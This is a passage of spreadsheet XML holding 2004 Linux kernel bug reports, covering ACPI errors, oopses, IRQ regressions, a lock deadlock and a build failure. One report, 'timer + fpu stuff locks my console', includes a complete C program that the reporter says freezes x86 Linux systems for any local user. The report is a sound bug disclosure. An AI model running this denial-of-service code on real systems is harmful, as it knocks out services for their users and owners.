10 add %dl,(%eax) Code; 0000000b Before first symbol b: 00 00 add %al,(%eax) Code; 0000000d Before first symbol d: 00 00 add %al,(%eax) Code; 0000000f Before first symbol f: 00 00 add %al,(%eax) Code; 00000011 Before first symbol 11: 0c 00 or $0x0,%al &lt;0&gt;Kernel panic: Attempted to kill the idle task!</t>
  </si>
  <si>
    <t>Region SystemMemory(0) has no handler</t>
  </si>
  <si>
    <t>2.4.27-pre3</t>
  </si>
  <si>
    <t>2004-05-30 13:53 UTC</t>
  </si>
  <si>
    <t>2004-08-27 13:29 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: ASUS P4C800E-Deluxe Software Environment: 2.4.27-pre3 Problem Description: I've tried latest kernel version. I'm now a bit lazy to upload dsdt table and other, but you can fetch them from my previous bugreports for this hardware (I report for two PC's only). ;) ACPI: Subsystem revision 20040326 PCI: PCI BIOS revision 2.10 entry at 0xf0031, last bus=3 PCI: Using configuration type 1 tbxface-0117 [03] acpi_load_tables : ACPI Tables successfully acquired Parsing all Control Methods:............................................................................................................ Table [DSDT](id F004) - 511 Objects with 48 Devices 150 Methods 14 Regions ACPI Namespace successfully loaded at root c0444bfc evxfevnt-0093 [04] acpi_enable : Transition to ACPI mode successful evgpeblk-0867 [06] ev_create_gpe_block : GPE 00 to 31 [_GPE] 4 regs at 0000000000000828 on int 9 evregion-0251 [24] ev_address_space_dispa: No handler for Region [BIOS] (c1c3ec54) [SystemMemory] exfldio-0283 [23] ex_access_region : Region SystemMemory(0) has no handler dswexec-0435 [16] ds_exec_end_op : [ShiftLeft]: Could not resolve operands, AE_NOT_EXIST psparse-1133: *** Error: Method execution failed [\GPRW] (Node c1c3aa34), AE_NOT_EXIST psparse-1133: *** Error: Method execution failed [\_SB_.PCI0.P0P4._PRW] (Node c1c382c4), AE_NOT_EXIST uteval-0154: *** Error: Method execution failed [\_SB_.PCI0.P0P4._PRW] (Node c1c382c4), AE_NOT_EXIST evgpeblk-0925 [06] ev_create_gpe_block : Found 0 Wake, Enabled 9 Runtime GPEs in this block Completing Region/Field/Buffer/Package initialization:.................................................................................. Initialized 13/14 Regions 42/42 Fields 41/41 Buffers 16/16 Packages (520 nodes) Executing all Device _STA and_INI methods:................................................... 51 Devices found containing: 51 _STA, 1 _INI methods ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: System [ACPI] (supports S0 S1 S3 S4 S5) ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) PCI: Ignoring BAR0-3 of IDE controller 00:1f.1 Transparent bridge - Intel Corp. 82801BA/CA/DB/EB PCI Bridge ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 10 *11 12 14 15) PCI: Probing PCI hardware Steps to reproduce:</t>
  </si>
  <si>
    <t>dead links in joystick documentation</t>
  </si>
  <si>
    <t>2004-05-31 08:33 UTC</t>
  </si>
  <si>
    <t>delafond</t>
  </si>
  <si>
    <t>2006-08-26 14:53 UTC</t>
  </si>
  <si>
    <t>Alexey Dobriyan</t>
  </si>
  <si>
    <t>Distribution: kernel source Hardware Environment: PC Software Environment: Mdk Problem Description: These links in joystick.txt seem to be dead http://www.suse.cz/development/input/ http://atrey.karlin.mff.cuni.cz/~vojtech/input/ Steps to reproduce: simply read linux/Doclumentation/input/joystick.txt</t>
  </si>
  <si>
    <t>2.6.7-rc2</t>
  </si>
  <si>
    <t>David Leemans</t>
  </si>
  <si>
    <t>acpi_power-sleep-wake</t>
  </si>
  <si>
    <t>2.6.*</t>
  </si>
  <si>
    <t>Fix acpi=ht in x86_64</t>
  </si>
  <si>
    <t>2004-06-01 19:43 UTC</t>
  </si>
  <si>
    <t>Suresh B Siddha</t>
  </si>
  <si>
    <t>2007-02-16 15:16 UTC</t>
  </si>
  <si>
    <t>In x86 kernel "acpi=ht" boot parameter means -- run only enough ACPI to enable Hyper Threading. This is broken in x86_64 kernel. "acpi=ht" still runs complete ACPI.</t>
  </si>
  <si>
    <t>Panic on HT laptop with no AC power (on batteries)</t>
  </si>
  <si>
    <t>2.6.5, 2.6.6</t>
  </si>
  <si>
    <t>2004-06-01 23:48 UTC</t>
  </si>
  <si>
    <t>Tom Cumming</t>
  </si>
  <si>
    <t>2006-01-04 22:38 UTC</t>
  </si>
  <si>
    <t>Distribution: 2.6.6 os on debian distr Hardware Environment: Fugitsu lifebook N series 3g HT cpu Software Environment: 2.6.6 from kernel.org, no patches or funny stuff, on debian distro. Problem Description: When running on batteries, NULL pointer in drivers/cpufreq/cpufreq.c:cpufreq_notify_transition(.., CPUFREQ_POSTCHANGE) when cpu == 1. Added code: if (cpufreq_cpu_data[freqs-&gt;cpu] != NULL) cpufreq_cpu_data[freqs-&gt;cpu]-&gt;cur = freqs-&gt;new; and system boots ok. I suspect this is not a correct fix because cpufreq_cpu_data should likely be not-NULL (cpu needs added). Stack trace is available, but I guess I have to type it in by hand unless someone knows how to scrape it off the screen somehow. cpufreq_notify_transition() was called by cpufreq_p4_setupdc(), and rdmsr(..THERM) returns 0x18 but returns 0x00 w/ AC. Steps to reproduce: Buy a fujitsu lifebook with HT processor. Boot 2.6.6 kernel w/o AC plugged in. Happens every time. Follows are some system infos: Linux andie 2.6.6 #2 SMP Tue Jun 1 23:10:41 PDT 2004 i686 GNU/Linux Gnu C 3.3.3 Gnu make 3.80 binutils 2.14.90.0.7 util-linux 2.12 mount 2.12 module-init-tools 3.0-pre10 e2fsprogs 1.35 pcmcia-cs 3.2.5 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.1 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0.91 Modules Loaded processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 3.00GHz stepping : 9 cpu MHz : 3000.972 cache size : 512 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid bogomips : 5931.00 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 3.00GHz stepping : 9 cpu MHz : 3000.972 cache size : 512 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe cid bogomips : 5980.16</t>
  </si>
  <si>
    <t>Make oldconfig silently disabled CONFIG_NET_GIGE and in turn CONFIG_TIGON3</t>
  </si>
  <si>
    <t>2004-06-02 07:36 UTC</t>
  </si>
  <si>
    <t>Thomas Zehetbauer</t>
  </si>
  <si>
    <t>2004-07-09 18:51 UTC</t>
  </si>
  <si>
    <t>Make oldconfig silently disabled support for my CONFIG_TIGON3 NIC. It seems that it depends on CONFIG_NET_GIGE which in turn depends on CONFIG_NET_ETHERNET which was not required in 2.6.6 kernel.</t>
  </si>
  <si>
    <t>boot delay before console displays</t>
  </si>
  <si>
    <t>2004-06-03 13:26 UTC</t>
  </si>
  <si>
    <t>Vince Littler</t>
  </si>
  <si>
    <t>2006-04-22 07:45 UTC</t>
  </si>
  <si>
    <t>posix_locks_deadlock() loops infinitely</t>
  </si>
  <si>
    <t>2004-06-03 22:45 UTC</t>
  </si>
  <si>
    <t>i-sakamoto</t>
  </si>
  <si>
    <t>2008-03-03 20:37 UTC</t>
  </si>
  <si>
    <t>fs_vfs</t>
  </si>
  <si>
    <t>Distribution: debian Hardware Environment: Software Environment: Problem Description: Using POSIX threads makes posix_locks_deadlock() loop infinitely. Steps to reproduce: There are 3 processes; "A", "B" and "C". Each process opens "file1", "file2" and "file3". "A" creates 3 POSIX threads; "A1", "A2" and "A3". (These threads' PIDs are the same.) "B" creates 2 POSIX threads; "B1" and "B2". (These threads' PIDs are the same.) "C" creates 1 POSIX thread; "C1". 1. "A1" locks "file1" exclusively. 2. "B1" locks "file2" exclusively. 3. "C1" locks "file3" exclusively. 4. "A2" trys to lock "file2" and sleeps (blocked by "B1"). 5. "A3" trys to lock "file3" and sleeps (blocked by "C1"). 6. "B2" trys to lock "file1". Here, posix_locks_deadlock() must detect deadlock, but it does not. Then "B2" sleeps (blocked "A1"). "A" "B" | | +--A1(LOCK)----&gt;(file1)&lt;-B2(*deadlock)-+ | | | | +--A2(BLOCK)---&gt;(file2)&lt;---B1(LOCK)----+ | | +--A3(BLOCK)---&gt;(file3)&lt;---C1(LOCK)----"C" block_list -&gt; A3(BLOCK) -&gt; A2(BLOCK) 7. "C1" unlocks "file3". ("A3" wakes up and locks "file3".) 8. "A3" unlocks "file3". 9. Another process locks "file1". This makes posix_locks_deadlock() loop infinitely.</t>
  </si>
  <si>
    <t>2.4.27-pre3 IRQ regression - IOAPIC SCI override</t>
  </si>
  <si>
    <t>2004-06-04 23:21 UTC</t>
  </si>
  <si>
    <t>2004-11-04 13:32 UTC</t>
  </si>
  <si>
    <t>David van Hoose reports that interrupts broke in 2.4.27-pre3: interrupts-2.4.27-pre2: CPU0 0: 6956 IO-APIC-edge timer 1: 136 IO-APIC-edge keyboard 2: 0 XT-PIC cascade 7: 2 IO-APIC-edge parport0 8: 1 IO-APIC-edge rtc 14: 25 IO-APIC-edge ide0 15: 683 IO-APIC-edge ide1 16: 11868 IO-APIC-level ft3xx, nvidia 17: 2 IO-APIC-level ohci1394 18: 0 IO-APIC-level SiS SI7012 19: 20 IO-APIC-level eth0 20: 41 IO-APIC-level acpi, usb-ohci 21: 0 IO-APIC-level usb-ohci 22: 72 IO-APIC-level usb-ohci 23: 0 IO-APIC-level ehci_hcd NMI: 0 LOC: 6907 ERR: 0 MIS: 0 interrupts-2.4.27-pre3 CPU0 0: 46794 local-APIC-edge timer 1: 1760 IO-APIC-edge keyboard 7: 2 IO-APIC-edge parport0 8: 1 IO-APIC-edge rtc 14: 25 IO-APIC-edge ide0 15: 683 IO-APIC-edge ide1 16: 18090 IO-APIC-level ft3xx, nvidia 17: 3 IO-APIC-level ohci1394 18: 0 IO-APIC-level SiS SI7012 19: 30 IO-APIC-level eth0 20: 0 none acpi, usb-ohci 21: 0 IO-APIC-level usb-ohci 22: 67 IO-APIC-level usb-ohci 23: 0 IO-APIC-level ehci_hcd NMI: 0 LOC: 46744 ERR: 0 MIS: 0 IRQ20 has no handler type, and the devices attached do not respond.</t>
  </si>
  <si>
    <t>SCI override to 2nd IOAPIC disables interrupt on 1st IOAPIC</t>
  </si>
  <si>
    <t>2.4.27</t>
  </si>
  <si>
    <t>2004-06-04 23:50 UTC</t>
  </si>
  <si>
    <t>2004-07-05 21:00 UTC</t>
  </si>
  <si>
    <t>On an Intel SCB2, the ACPI SCI in IOAPIC mode is to IRQ31, which turns out to be pin 15 of the 2nd IOAPIC. But this causes pin15 on the 1st IOAPIC to not get initialized with an identify mapping because that code doesn't expect an override to be to an IOAPIC other than the 1st.</t>
  </si>
  <si>
    <t>2.6.6 crashes</t>
  </si>
  <si>
    <t>2004-06-06 02:47 UTC</t>
  </si>
  <si>
    <t>2004-07-08 06:12 UTC</t>
  </si>
  <si>
    <t>Distribution: WhiteBox Enterprise Linux 3.0 (RedHat Enterprise clone) Hardware Environment: IBM x330, dual Pentium III, 2 GB memory, qlogic qla2300 fibre channel connected disks Software Environment: NFS-exported filesystems are XFS. Problem Description: My NFS server has crashed 3 times the last three weeks. I only managed to catch the latest oops: Unable to handle kernel paging request at virtual address 9c010000 printing eip: c013c9a5 *pde = 00000000 Oops: 0002 [#1] SMP CPU: 1 EIP: 0060:[&lt;c013c9a5&gt;] Not tainted EFLAGS: 00010012 (2.6.6) EIP is at free_block+0x65/0xf0 eax: ed2f7000 ebx: d8ff9000 ecx: d8ff9f58 edx: 9c010000 esi: f7ffd5a0 edi: 00000004 ebp: f7ffd5b8 esp: c0529f78 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c0529000 task=f7f890e0) Stack: f7ffd5c8 00000018 f7fcb410 00000018 f7fcb400 f7fcb410 f7ffd5a0 c013d1b0 f7ffd5a0 f7ffd620 c2022580 c0529fd0 c013d371 c0529000 c20236a0 00000001 00000286 c013d2b0 c20236a0 c2022580 c0529fd0 c0125184 c0529fd0 c0529fd0 Call Trace: [&lt;c013d1b0&gt;] drain_array+0x70/0xb0 [&lt;c013d371&gt;] reap_timer_fnc+0xc1/0x1a0 [&lt;c013d2b0&gt;] reap_timer_fnc+0x0/0x1a0 [&lt;c0125184&gt;] run_timer_softirq+0xc4/0x160 [&lt;c0121195&gt;] __do_softirq+0xb5/0xc0 [&lt;c01098bc&gt;] do_softirq+0x4c/0x60 ======================= [&lt;c0113f5c&gt;] smp_apic_timer_interrupt+0xcc/0x130 [&lt;c0104880&gt;] default_idle+0x0/0x40 [&lt;c0107306&gt;] apic_timer_interrupt+0x1a/0x20 [&lt;c0104880&gt;] default_idle+0x0/0x40 [&lt;c01048ad&gt;] default_idle+0x2d/0x40 [&lt;c0104946&gt;] cpu_idle+0x46/0x50 [&lt;c011d917&gt;] __call_console_drivers+0x57/0x60 [&lt;c011da20&gt;] call_console_drivers+0x90/0x120 Code: 89 02 8b 43 0c c7 03 00 01 10 00 31 d2 c7 43 04 00 02 20 00 &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Steps to reproduce:</t>
  </si>
  <si>
    <t>IRQ trouble for SCSI and SATA in 2.6.6</t>
  </si>
  <si>
    <t>2004-06-09 02:28 UTC</t>
  </si>
  <si>
    <t>Marco Gaiarin</t>
  </si>
  <si>
    <t>2006-08-03 13:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux 3.0r2 woody + Bunk packages Hardware Environment: ASUS P4P800 Deluxe MoBo, Adaptec 2902 Software Environment: none Problem Description: I've a box as like explained above, that works flawlessy with a 2.6.4 kernel, on a plain debian woody with only the bunk packages for 2.6 (http://www.fs.tum.de/~bunk/packages/woody/kernel-26.html). I've compiled the (plain, downloaded from kernel.org) 2.6.6 kernel with the new Adaptec driver (CONFIG_SCSI_AIC7XXX) and the kernel on boot oopses with a last message: kernel panic: for safety if i compile the same kernel with the old Adaptec driver (CONFIG_SCSI_AIC7XXX_OLD) the kernel oopses but not hang, but scsi peripherals are not identified and does not work. Note also (i'll attach full boot logs and .config) that the primary IDE (PATA) disk run at UDMA/100 in 2.6.6 (instead of DMA/133 of 2.6.4), and also the two IDE (SATA) disks start with some delay (15 secs) and some errors. As you can see, also, i've some error on irq 18, but this is not the same of bug #2848, i'm just in compatible mode, i've no peripheral in secondary IDE channel, hdc and hdd to be clear. I've also tried to do a boot with pci=noacpi, nothing changed. This is a production machine, my database server, so i cannot do easly tests... Steps to reproduce: every kernel boot Many thanks.</t>
  </si>
  <si>
    <t>ac_adapter and battareys dasn.</t>
  </si>
  <si>
    <t>kernel -2.6.9</t>
  </si>
  <si>
    <t>2004-06-09 12:03 UTC</t>
  </si>
  <si>
    <t>Oleksij Rempel (fishor)</t>
  </si>
  <si>
    <t>2005-04-17 06:25 UTC</t>
  </si>
  <si>
    <t>Distribution:Samsung Hardware Environment:laptop NV5000 Software Environment:RedHat9 Problem Description: ACPI-0347: *** Error: Handler for [EmbeddedControl] returned AE_BAD_PARAMETER ACPI-1133: *** Error: Method execution failed [\_SB_.BAT0._STA] (Node c1148cbc), AE_BAD_PARAMETER ACPI-0347: *** Error: Handler for [EmbeddedControl] returned AE_BAD_PARAMETER ACPI-1133: *** Error: Method execution failed [\_SB_.ADP0._STA] (Node c1148b9c), AE_BAD_PARAMETER Steps to reproduce:</t>
  </si>
  <si>
    <t>Oops in usb code at kernel init</t>
  </si>
  <si>
    <t>2.6.7-rc3-mm1</t>
  </si>
  <si>
    <t>2004-06-09 14:11 UTC</t>
  </si>
  <si>
    <t>2004-06-14 07:26 UTC</t>
  </si>
  <si>
    <t>Distribution: Up-to-date Fedora devel Hardware Environment: http://www.giga-byte.com/products/7vax.htm (Via KT 400 + Via VT 8235 + Realtek RTL8100BL), full usb2 input Software Environment: kernel Problem Description: ooops at startup</t>
  </si>
  <si>
    <t>timer + fpu stuff locks my console</t>
  </si>
  <si>
    <t>2.4.x and 2.6.x</t>
  </si>
  <si>
    <t>2004-06-11 05:27 UTC</t>
  </si>
  <si>
    <t>Stian Skjelstad</t>
  </si>
  <si>
    <t>2004-06-21 13:34 UTC</t>
  </si>
  <si>
    <t>Distribution: tested on debian, redhat, fedora and more Hardware Environment: x86 with fpu Software Environment: gcc 3.x.x Problem Description: First I did some report about this here http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=108681568931323&amp;w=2 refering to this http://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905 But the respons was not that big, and I didn't know about this page yet, so here it comes. Compiling the program below and running it on a x86 machine with a 2.4.x or 2.6.x based kernel freezes all user-space programs and kernel schedules like disk i/o. The only respons you will get from the system is the three leds on the keyboard and ALT+SysRq combinations. Ctrl-Alt-Del doesn't work since that schedules a signal to init which never gets ran. I think personally the problem comes due to a small bug in gcc with memory-offets beeing off by 4, but the claim it should be like that, so you guys can deside. Anyhow, the program is that regular users can poll down any x86-linux-servers if they have a shell. Not just a DDOS, but KILL it. I think this bug deserves some more attention and fixing for 2.4 and 2.6 kernels. #include &lt;sys/time.h&gt; #include &lt;signal.h&gt; #include &lt;unistd.h&gt; static void Handler(int ignore) { char fpubuf[108]; __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); write(2, "*", 1); __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); } int main(int argc, char *argv[]) { struct itimerval spec; signal(SIGALRM, Handler); spec.it_interval.tv_sec=0; spec.it_interval.tv_usec=100; spec.it_value.tv_sec=0; spec.it_value.tv_usec=100; setitimer(ITIMER_REAL, &amp;spec, NULL); while(1) write(1, ".", 1); return 0; } Steps to reproduce: Compile the above and run on a x86 machine. Hopes this can be fixed before people start to take advantage over it. Stian Skjelstad</t>
  </si>
  <si>
    <t>Undefined symbol during link</t>
  </si>
  <si>
    <t>2.6.7-rc2-mm2</t>
  </si>
  <si>
    <t>2004-06-12 10:23 UTC</t>
  </si>
  <si>
    <t>James B. Hiller</t>
  </si>
  <si>
    <t>2004-07-10 04:44 UTC</t>
  </si>
  <si>
    <t>Distribution: none Hardware Environment: Tyan S2460 motherboard (dual processor, Tiger MP 1.05 BIOS, AMD 760 MP chipset AMD Athlon MP 1.2 Palomino CPU (2) 512 MB DDR eVGA.com eGeForce FX 5200 AGP video card (128 MB) Creative SBLive! sound card Western Digital IDE hard drives HP CDW 7200i CD writer DLink DWL-520 wireless network card Software Environment: gcc 3.2.3 gnu make 3.80 binutils 2.14.90.0.6 util-linux-2.11y e2fsprogs 1.34 procps 3.2.0 Problem Description: Kernel compilation initiated with either make bzImage or make bzlilo fails during link with the following: ... GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 arch/i386/kernel/built-in.o(.text+0xdc65): In function `acpi_register_gsi': : undefined reference to `mp_register_gsi' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: Use following config: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_KERNEL_IMAGE_BZIMAGE=y # CONFIG_KERNEL_IMAGE_ZIMAGE is not set # CONFIG_KERNEL_IMAGE_VMLINUX is not set CONFIG_KERNEL_IMAGE="arch/i386/boot/bzImage" # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y # CONFIG_BSD_PROCESS_ACCT_V3 is not set CONFIG_SYSCTL=y # CONFIG_AUDIT is not set CONFIG_LOG_BUF_SHIFT=15 CONFIG_HOTPLUG=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y CONFIG_STOP_MACHINE=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set CONFIG_X86_GENERIC=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HPET_TIMER is not set CONFIG_SMP=y CONFIG_NR_CPUS=2 # CONFIG_SCHED_SMT is not set CONFIG_PREEMPT=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=y CONFIG_X86_CPUID=y # # Firmware Drivers # # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_IRQBALANCE=y CONFIG_HAVE_DEC_LOCK=y CONFIG_REGPARM=y # # Performance-monitoring counters support # CONFIG_PERFCTR=y # CONFIG_PERFCTR_INIT_TESTS is not set CONFIG_PERFCTR_VIRTUAL=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # CONFIG_PM_DISK is not set # # ACPI (Advanced Configuration and Power Interface) Support # # CONFIG_ACPI is not set CONFIG_ACPI_BOOT=y # # APM (Advanced Power Management) BIOS Support # # CONFIG_APM is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_PCI_USE_VECTOR is not set CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_MISC=y # # Device Drivers # # # Generic Driver Options # # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y CONFIG_PARPORT_PC_CML1=y # CONFIG_PARPORT_SERIAL is not set CONFIG_PARPORT_PC_FIFO=y CONFIG_PARPORT_PC_SUPERIO=y # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_CARMEL is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_SIZE=4096 CONFIG_BLK_DEV_INITRD=y # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y # CONFIG_IDEDISK_MULTI_MODE is not set # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set # CONFIG_IDE_TASKFILE_IO is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set CONFIG_BLK_DEV_AMD74XX=y # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y CONFIG_IDEDMA_IVB=y CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI Transport Attributes # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # 